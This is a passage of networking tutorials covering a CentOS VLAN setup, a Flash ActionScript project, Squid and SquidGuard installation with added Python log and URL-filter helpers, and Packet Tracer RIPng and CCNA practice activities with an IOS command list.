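# three files into /etc/sysconfig/network-scripts and run "service network restart".
#   mkdir /root/ifcfg-test && write_vlan_ifcfg /root/ifcfg-test
```

The DEVICE name with the dot plus VLAN="yes" is what makes the network scripts load the 8021q module and create the tagged subinterface on boot; the switch port the NIC plugs into must be a trunk carrying both VLAN numbers.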

Note: For a demonstration of this tutorial, see the video below: Use CentOS Linux for Routing, Proxy, NAT, DHCP - Part 9

Video Tutorials

In part 7, I demonstrate how to save your iptables configuration and make it permanent

In part 8, I manually configure and save the Ethernet network interfaces, IP addresses and gateway address

In part 9, I manually configure a single network interface to be multiple subinterfaces in order to support VLANs and trunking


A Flash Spaceship with Movieclips and Buttons - Actionscript 2 & 3


Overview

A basic tutorial on Flash interactivity. In this project you create a Flash spaceship movieclip with 3 different states: thrusting, stopped, and shields. You will write the Actionscript code for three buttons, that will move the movieclip to three different animated states.

In the video tutorials below, I demonstrate how to create this project in Flash Professional CS6. The project uses: keyframe animation, movieclips, buttons, frame labels, instance names, the gotoAndPlay() and gotoAndStop() function, and the onPress event handler.

Video Tutorials 

In part 1, I create the spaceship movieclip and the three button symbols

In part 2, I create a looping animation and write the actionscript to control the timeline playhead using Flash buttons

In part 3, I set the button activation area, create timeline keyframe animation, use frame labels
with the gotoAndPlay() function, and use the onPress event handler to create a custom button function

In part 4, I show how to convert the Flash file from Actionscript 2.0 to 3.0

First Generation Video Tutorials

The videos below are early tutorials that I created for this project. In the videos, I am using an older version of Flash. The videos are examples of some of my earliest attempts at creating video tutorials. Even though the project was created with Flash CS3, the scripting is still valid Actionscript 2.0 code and will work in current versions of Flash.

Watch the videos and create the project. Save your flash authoring file (.fla) and email it to my gmail account as an attachment.

Note: The tutorials above were created in Flash CS3, but can easily be created in Flash CS4 or CS5. Make sure to choose Actionscript 2.0 when creating a new file to work from.

How to Install Squid & SquidGuard in CentOS


How to Install Squid and SquidGuard in CentOS Overview

A proxy server is a very useful tool for a computer network. Proxy servers are commonly used in computer networks to protect the network from attack, to filter undesirable web content and web pages requested by local users, and to speed up the delivery of web pages and web content by caching (storing) commonly requested web pages, documents, and media. Proxy servers are typically implemented on private local area networks to filter, protect and cache content requested by users on that network; this is called a "proxy" or "transparent proxy." Proxy servers can also be implemented on the remote side, "in front of" destination web servers, in order to protect those servers by filtering requests, speeding up web page delivery, and caching frequently requested files; this is called a "reverse proxy."

Squid is one of the most popular and most used proxy servers in the world. It is free to download, easy to install and it can be implemented on any distribution of Linux. Here are the steps to install and configure Squid and SquidGuard on a CentOS distribution of Linux.  



Types of Proxy Servers

Proxy Server - The web browser on the client is configured to point to the proxy server's IP address. The client can bypass the proxy server by removing or altering the proxy address configuration. An administrator could prevent this by creating a GPO in Active Directory that blocks access to the web browser settings. A proxy server can also function as a caching server.

Transparent Proxy Server - The router sends all traffic on defined ports to the transparent proxy server; this way clients cannot bypass the proxy server. A transparent proxy server can also function as a caching server.

Reverse Proxy Server (Cache) - The reverse proxy server or cache server is placed in front of, or prior to, the web server in order to speed up delivery of frequently requested pages and to protect the web server by creating a layer of separation and redundancy.


Step-by-step instructions

1. Install Squid, start it, and set it to start on boot.

$ su -
# yum install squid
# service squid start
# chkconfig squid on

Check to see if it is listening on port 3128.

# netstat -antp |grep squid
# ps -aux |grep squid

2. Edit the Squid configuration file to change Squid from IPv6 to IPv4, then reload Squid.

# vim /etc/squid/squid.conf

On line 62 change :::3128 to 0.0.0.0:3128, then save and quit.

# service squid reload

3. Set Firefox to use the Squid web proxy. Open Firefox > Edit > Preferences > Advanced > Network tab > Connection Settings > Manual proxy configuration.

set it to: 127.0.0.1:3128

4. You can monitor the access log to see it working.

# tail -f /var/log/squid/access.log 

Now browse somewhere in Firefox to see if you are able to receive webpages through the Squid proxy.
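Watching tail -f is fine for a quick check, but once traffic flows you will want to summarise the log rather than read it line by line. The script below is an added example, not part of the original post: it parses Squid's default native access.log format and reports, per client, the request count, bytes transferred, denied requests and the hosts contacted. The log lines and addresses embedded in it are constructed samples.

```python
"""Summarise Squid's native access.log format.

Added example, not from the original post.  The native format is one request
per line, space separated:
  timestamp elapsed_ms client result/status bytes method url user hierarchy/peer [mime]
The lines and addresses below are constructed samples, not real traffic.
"""
from collections import Counter

SAMPLE_LOG = """\
1381270730.523    234 127.0.0.1 TCP_MISS/200 4520 GET http://danscourses.com/ - DIRECT/203.0.113.10 text/html
1381270731.101     12 127.0.0.1 TCP_HIT/200 1812 GET http://danscourses.com/style.css - NONE/- text/css
1381270735.880    402 192.168.1.20 TCP_MISS/200 8123 GET http://www.google.com/ - DIRECT/203.0.113.20 text/html
1381270740.004      0 192.168.1.20 TCP_DENIED/403 3601 GET http://yahoo.com/ - NONE/- text/html
1381270741.777      1 192.168.1.20 TCP_DENIED/403 3601 CONNECT msn.com:443 - NONE/- -
"""


def host_of(url):
    """Bare host of a logged URL.  GET/POST lines carry a full URL; CONNECT
    lines carry only host:port.  Handles user:pass@ and [IPv6] literals."""
    netloc = url.split("://", 1)[-1].split("/", 1)[0].rpartition("@")[2]
    host = netloc[1:netloc.index("]")] if netloc.startswith("[") else netloc.split(":", 1)[0]
    return host.lower().rstrip(".")


def parse_line(line):
    """Parse one native-format line into a dict; return None if it is malformed."""
    parts = line.split()
    if len(parts) < 9:
        return None
    result, _, status = parts[3].partition("/")
    try:
        return {
            "time": float(parts[0]),
            "elapsed_ms": int(parts[1]),
            "client": parts[2],
            "result": result,          # e.g. TCP_MISS, TCP_HIT, TCP_DENIED
            "status": int(status),     # HTTP status code
            "bytes": int(parts[4]),
            "method": parts[5],
            "url": parts[6],
            "host": host_of(parts[6]),
            "user": parts[7],
        }
    except ValueError:
        return None


def summarize(log_text):
    """Per-client totals: requests, bytes, denied requests and hosts contacted."""
    stats = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats.setdefault(rec["client"],
                             {"requests": 0, "bytes": 0, "denied": 0, "hosts": Counter()})
        s["requests"] += 1
        s["bytes"] += rec["bytes"]
        if rec["result"].startswith("TCP_DENIED"):
            s["denied"] += 1
        s["hosts"][rec["host"]] += 1
    return stats


if __name__ == "__main__":
    for client, s in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{client:15} req={s['requests']:3} denied={s['denied']:3} "
              f"bytes={s['bytes']:7} hosts={dict(s['hosts'])}")
```

Run it against the real file with `python summarize.py < /var/log/squid/access.log` after replacing SAMPLE_LOG with sys.stdin.read(); the per-client denied count is the quickest way to spot a client that keeps hitting blocked destinations.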

5. With Squid working you can now go about installing SquidGuard.

If you do not already have the EPEL repositories, you will need to install additional repositories in CentOS in order to access the necessary software packages that are not available in the default repositories. Install the Extra Packages for Enterprise Linux (EPEL) repository, i.e. the epel-release package for the current version of Enterprise Linux (EL6). You can find it at the following website: http://fedoraproject.org/wiki/EPEL. A direct link to the RPM is in the command below; eventually the link will be outdated and need to be replaced.

# yum install http://ftp.osuosl.org/pub/fedora-epel/6/i386/epel-release-6-8.noarch.rpm

Now install SquidGuard.

# yum install squidGuard

6. Now that SquidGuard is installed, open Firefox and go to the SquidGuard website: http://squidguard.org. The SquidGuard website has links to configuration documentation and to websites where you can download blacklists. You need to download a blacklists file: go to http://dsi.ut-capitole.fr/blacklists/ and copy the link for the blacklists.tar.gz file, then either download it with wget by pasting the link, or download it through the Firefox web browser. SquidGuard ships with its own blacklists.tar.gz file, and you will eventually want to replace it with the newer blacklists.tar.gz file that you downloaded. Before you do that, you can create a test blacklist for SquidGuard to block. To do that, create a blacklists directory inside /var/squidGuard/, then, in the new blacklists directory, use vim to create and edit a text file called testdomains.

# cd /var/squidGuard
# mkdir blacklists
# cd blacklists
# vim testdomains

Type in three lines of text to add some test domains to block:
yahoo.com
msn.com
whatever-you-want-to-block.com

save and exit.

7. Now edit the squidGuard.conf file to configure it to work with the testdomains file.

# vim /etc/squid/squidGuard.conf

In the config file, make the following changes (the original post highlighted the new elements in red): comment out the dest adult block and the pass line in the foo-clients acl, add the dest test block, and in the default acl change the pass line to pass !test any with a redirect to https://www.google.com. Note that domainlist paths are relative to the dbhome directive at the top of the file, which must point at /var/squidGuard/blacklists for testdomains to be found. The edited sections should look like this:

#dest adult {
#   domainlist blacklists/porn/domains
#   urllist blacklists/porn/urls
#   expressionlist blacklists/porn/expressions
#   redirect        http://admin.foo.bar.de/cgi/blocked?clientaddr=%a+clientname=%n+clientuser=%i+clientgroup=%s+targetgroup=%t+url=%u
#}

dest test {
    domainlist testdomains
    redirect https://www.google.com
}

acl {
    admin {
        pass any
    }

    foo-clients within workhours {
    #   pass good !in-addr !adult any
    } else {
        pass any
    }

    bar-clients {
        pass local none
    }

    default {
        pass !test any
        rewrite dmz
        redirect https://www.google.com
    }
}

8. Now compile the SquidGuard blacklists and chown the blacklists to be accessible by Squid.

# squidGuard -b -d -C all
# chown -R squid /var/squidGuard/blacklists 

9. Edit the squid.conf file and then reload Squid.

# vim /etc/squid/squid.conf

add the following line to the squid.conf file around line 28:

url_rewrite_program /usr/bin/squidGuard

# service squid reload

10. Now open the Firefox browser and test to see if your testdomains are blocked but every other domain is allowed. 
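To show what the url_rewrite_program line in step 9 actually wires up, here is a small helper that emulates the domainlist check squidGuard performs for the dest test block. It is an added example, not squidGuard's code and not part of the original post: it embeds a constructed copy of the testdomains file, and it assumes the classic Squid 3.x helper line format (one request per line on stdin, `URL client_ip/fqdn ident method ...`; one reply per line on stdout, either a replacement URL or an empty line meaning "pass unchanged"). Check the url_rewrite_program section of the squid.conf documentation for the Squid version you run.

```python
"""Minimal Squid url_rewrite_program helper with squidGuard-style domainlist
matching.  Added example: not squidGuard's code, not from the original post.

Assumed (classic Squid 3.x) helper protocol:
  stdin : one request per line   ->  URL client_ip/fqdn ident method [extras]
  stdout: one reply per line     ->  replacement URL, or an empty line to pass
"""
import sys

# Constructed stand-in for /var/squidGuard/blacklists/testdomains (step 6 above)
TESTDOMAINS = """\
yahoo.com
msn.com
whatever-you-want-to-block.com
"""
REDIRECT_URL = "https://www.google.com"   # same target as the dest test block


def load_domainlist(text):
    """One domain per line; blank lines and '#' comments are ignored."""
    domains = set()
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip().lower().rstrip(".")
        if entry:
            domains.add(entry)
    return domains


def host_of(url):
    """Host of a request URL; CONNECT requests arrive as bare host:port."""
    netloc = url.split("://", 1)[-1].split("/", 1)[0].rpartition("@")[2]
    host = netloc[1:netloc.index("]")] if netloc.startswith("[") else netloc.split(":", 1)[0]
    return host.lower().rstrip(".")


def in_domainlist(host, domains):
    """squidGuard semantics: an entry matches the domain itself and every
    subdomain, so 'yahoo.com' covers 'mail.yahoo.com' but not 'notyahoo.com'."""
    labels = host.split(".")
    return any(".".join(labels[i:]) in domains for i in range(len(labels)))


def rewrite(request_line, domains, redirect_url=REDIRECT_URL):
    """Reply for one helper request line: the redirect URL if the host is
    blacklisted, otherwise '' so Squid serves the original request."""
    fields = request_line.split()
    if not fields:
        return ""
    return redirect_url if in_domainlist(host_of(fields[0]), domains) else ""


def serve(stdin=sys.stdin, stdout=sys.stdout, domains=None):
    """Helper main loop.  Every reply must be flushed: Squid blocks on it."""
    if domains is None:
        domains = load_domainlist(TESTDOMAINS)
    for line in stdin:
        stdout.write(rewrite(line, domains) + "\n")
        stdout.flush()


if __name__ == "__main__":
    serve()
```

Two operational details this makes visible: a single entry covers the domain and all of its subdomains, which is why yahoo.com in testdomains also blocks www.yahoo.com, and the helper must flush after every reply or Squid stalls waiting for it. Returning a plain URL makes Squid silently fetch the replacement page; prefixing the reply with 302: tells Squid to send an HTTP redirect to the client instead, which keeps the block visible in the browser.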

 


Packet Tracer 6 Activity - RIPng and IPv6


Overview

The goal in this activity is to configure an IPv6 network with the RIPng routing protocol. In addition to configuring RIPng on the routers, you will need to configure all of the devices in the network with the correct IPv6 addressing. The goal is to configure the routers and PCs with the following information:

• Enable IPv6 routing on all routers,
• On all routers, configure link-local and global unicast IPv6 addresses with network prefix lengths (see the network diagram),
• On routers R1, R2, and R3 configure the RIPng IPv6 routing protocol (use the name: RIP1 in all caps as the routing process name),
• On router R1, configure a default route towards the ISP router, and use RIPng to distribute that route to routers R2 and R3,
• On router ISP, configure a summary route to reach all of the subnets on R1, R2, and R3,
• On the PCs configure static IPv6 addresses with network prefix lengths, and gateway addresses (see the network diagram),
• Configure hostnames on all routers and save the running configuration to the startup-configuration file

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PCB from PCA).

 

RIPng PT activity

Download

RIPng.zip 

Note: You will need Packet Tracer version 6.0.1 to open this activity

 

Spoiler Alert - read below if you are stuck and need help with the commands

IOS Command List

router>enable
router#configure terminal
router(config)#hostname R1
R1(config)#ipv6 unicast-routing
R1(config)#interface g0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:1::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#no shut
R1(config-if)#interface s0/0/0
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:DA:2::1/64
R1(config-if)#ipv6 rip RIP1 enable
R1(config-if)#ipv6 rip RIP1 default-information originate
R1(config-if)#clock rate 128000
R1(config-if)#no shut
R1(config-if)#interface s0/0/1
R1(config-if)#ipv6 address FE80::1 link-local
R1(config-if)#ipv6 address 2001:DB8:CD1:C::2/64
R1(config-if)#no shut
R1(config-if)#exit
R1(config)#ipv6 route ::/0 s0/0/1
R1(config)#exit
R1#copy running-config startup-config
R1#show running-config
R1#show ipv6 route
R1#show ipv6 int brief
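The summary route on the ISP router is the one task in the list where the prefix has to be worked out rather than copied from the diagram. The snippet below is an added example, not part of the activity, that computes the smallest prefix covering a set of subnets and how much address space the summary advertises beyond them. The three /64s are constructed samples: 2001:DB8:DA:1::/64 and 2001:DB8:DA:2::/64 appear in the command list, 2001:DB8:DA:3::/64 is assumed, so check your own diagram before using the result.

```python
"""Summary-route calculation for a set of IPv6 subnets.

Added example, not from the original activity.  The sample prefixes are
constructed: the first two are in the command list above, the third is assumed.
"""
import ipaddress

SAMPLE_SUBNETS = [
    "2001:DB8:DA:1::/64",   # R1 g0/0 (from the command list)
    "2001:DB8:DA:2::/64",   # R1 s0/0/0 (from the command list)
    "2001:DB8:DA:3::/64",   # assumed: a further subnet behind R2/R3
]


def summarize(prefixes):
    """Smallest single prefix that contains every network in prefixes.

    Starts from the first network and widens it one bit at a time until the
    candidate supernet contains all of the others.
    """
    nets = [ipaddress.ip_network(p, strict=False) for p in prefixes]
    if len({n.version for n in nets}) != 1:
        raise ValueError("all prefixes must be the same IP version")
    candidate = nets[0]
    while not all(n.subnet_of(candidate) for n in nets):
        candidate = candidate.supernet()
    return candidate


def extra_address_count(prefixes):
    """Addresses the summary advertises that belong to none of the listed
    subnets.  Overlapping inputs are merged first so nothing is double counted."""
    summary = summarize(prefixes)
    nets = [ipaddress.ip_network(p, strict=False) for p in prefixes]
    used = sum(n.num_addresses for n in ipaddress.collapse_addresses(nets))
    return summary.num_addresses - used


if __name__ == "__main__":
    route = summarize(SAMPLE_SUBNETS)
    print(f"summary route: {route}")
    print(f"unused /64s covered by it: {extra_address_count(SAMPLE_SUBNETS) // 2**64}")
```

The prefix it returns is what the ISP's ipv6 route statement would carry. The unused-space figure is worth a glance: with R1 holding a default route towards ISP and ISP holding a summary back towards R1, a packet for an address inside the summary that no subnet actually uses bounces between the two routers until its hop limit expires, unless R1 also has a discard route for the summary.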



CCNA1 Practice Final - Packet Tracer 6


Lab Overview - CCNA 1 Practice Final

I designed this virtual lab activity to test you on the skills and knowledge necessary for the Cisco Academy CCNA5.0, Introduction to Networking hands-on lab final and Packet Tracer final. You will need Packet Tracer 6.0.1 to open the activity file. The activity tracks your overall progress and provides feedback on correctly executed tasks. Here is a list of the knowledge and skill areas that it covers:

• IPv4 addressing and subnetting,
• IPv6 addressing,
• Basic network device configuration for routers and switches,
• Basic network device access, security and encryption,
• Secure remote administration,
• Backing up network device configuration files to a TFTP server

The scoring is based on the total number of items correctly configured. Remember that when entering configurations the system is case sensitive. When you are finished, you should be able to communicate across the network (e.g. successfully ping PC0 from PC2). In this PT activity access to the CLI tab has been disabled, so in order to configure the router and switches, you will need to console-in, using the console cable and the PC's terminal emulation program.

 


Download

CCNA1-practice-final.zip

Note: You will need Packet Tracer version 6.0.1 to open this activity

 
